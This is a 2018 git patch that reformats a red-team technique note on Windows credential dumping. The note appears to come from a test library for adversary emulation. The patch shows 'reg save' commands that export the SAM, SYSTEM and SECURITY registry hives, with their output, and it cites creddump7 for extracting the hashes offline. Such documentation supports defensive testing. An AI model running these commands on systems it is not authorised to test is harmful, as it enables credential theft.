From e10be818ef4c1a6aff95d4dd2d6524d19ae2cccc Mon Sep 17 00:00:00 2001
From: Michael Haag <michaelahaag@gmail.com>
Date: Wed, 21 Mar 2018 14:13:10 -0400
Subject: [PATCH] Update Credential_Dumping.md

---
 Windows/Credential_Access/Credential_Dumping.md | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/Windows/Credential_Access/Credential_Dumping.md b/Windows/Credential_Access/Credential_Dumping.md
index 461542a3..050fb8a2 100644
--- a/Windows/Credential_Access/Credential_Dumping.md
+++ b/Windows/Credential_Access/Credential_Dumping.md
@@ -35,16 +35,19 @@ Output:
     test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
     C:\>
 
-## via Registry
-Local SAM (sam & system), cached credentials (system & security) and LSA secrets (system & security) can be enumerated via three registry keys.
+## Registry 
+
+Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys:
 
 Input:
+    
     reg save HKLM\sam sam 
     reg save HKLM\system system
     reg save HKLM\security security
   
 Output:
+
     C:\>reg save HKLM\sam sam
     The operation completed successfully.
 
-These hives can be prcossed locally using creddump7 (https://github.com/Neohapsis/creddump7)
+These can be processed locally using [creddump7](https://github.com/Neohapsis/creddump7)